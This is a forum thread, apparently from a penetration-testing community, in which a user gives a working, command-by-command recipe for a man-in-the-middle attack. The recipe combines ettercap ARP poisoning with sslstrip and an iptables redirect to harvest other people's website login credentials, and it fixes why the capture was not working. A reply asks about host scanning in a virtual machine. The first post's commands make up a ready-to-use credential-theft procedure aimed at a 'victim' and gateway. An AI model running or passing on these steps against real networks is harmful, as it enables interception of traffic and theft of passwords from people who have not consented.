Results 1 to 2 of 2

Thread: Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

Hybrid View

  1. #1
    Just burned their ISO
    Join Date
    Dec 2012

    Default Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

    I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials to logins at sites.
    A LOT of videos and how-to write ups for ettercap and sslstrip and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer
    Other sites I've been to say to do the following (ex.):

    #Open Terminal
    #Redirects requests on port 80 to sslstrip running on port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000]
    echo "1" > /proc/sys/net/ipv4/ip_forward
    #You can check the forwarding if you want by typing:
    cat /proc/sys/net/ip_forward
    #You should see a "1" there

    #New Terminal

    #Run sslstrip logging on port 10000
    sslstrip -p -f
    #I use -p for log only SSL Posts. -f substitutes a lock favicon on secure requests

    #(Optional) You can monitor the log
    tail -F sslstrip.log
    #Launch ettercap gui with packet dump
    ettercap -G -w ~/ettercap_packets.pcap
    #In Ettercap enter unified sniffing
    Sniff->Unified Sniffing
    #Select your interface
    wlan0 (example)
    #Scan for hosts
    Hosts->Scan for hosts
    #View hosts list for scan
    Hosts->Hosts list
    #Select Targets
    Highlight the victim -> Add to Target 1
    Highlight the victim -> Add to Target 2
    #View the added targets
    Targets -> Current Targets
    #Perform Arp poisoning (Mitm attack) on targets
    Mitm -> Arp Poisoning (Sniff remote connections)
    Start -> Start Sniffing
    This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward) so there is no need to do it. In fact if you run ettercap after you type in that command it will just set the (/proc/sys/net/ipv4/ip_forward) back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it will set the kernel to "0". It describes it in the man page.

    The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out sslstrip (I'm using .9 version) only works with python 2.5 and up. If you look at the file at gedit /pentest/web/sslstrip/ you will see at the top:

    #!/usr/bin/env python
    #You need to change it to:
    The quickest way to setup everyting for me and have it working is without GUI and just type below:

    iptables -t nat --flush (To flush any added rules to the nat tables)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -p -f (only logging https and uses the Favicon)

    OPEN another terminal:
    ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)

    Thats it. After that everything was working smooth.

  2. #2
    Just burned his ISO
    Join Date
    Dec 2011

    Default Re: Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

    Hello Altoid. Can you help me in figuring out about a trouble in ettercap usage. I don't get the Attacker (backtrack OS) in list when i scan for hosts. It gives me the Host OS (WIN 07) and my gateway (internet router) in the hosts list. I am using Backtrack in VM Ware with network adapter in bridged mode.

Similar Threads

  1. sslstrip+ettercap yahoo mail issue
    By scorpoin in forum BackTrack 5 General Topics
    Replies: 0
    Last Post: 05-31-2011, 06:10 AM
  2. Replies: 3
    Last Post: 04-04-2011, 12:55 PM
  3. tools for MITM attacks on a VPN tunnels?
    By guitar_adam2000 in forum OLD General IT Discussion
    Replies: 1
    Last Post: 08-15-2009, 04:17 AM
  4. Is it possible to use MITM attacks on 802.1x?
    By Lord MuffloN in forum OLD Wireless
    Replies: 2
    Last Post: 10-06-2008, 12:04 PM
  5. [Solved] VMWare HDD Installation Issue Solved
    By Plasma_GR in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 05-08-2007, 09:05 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts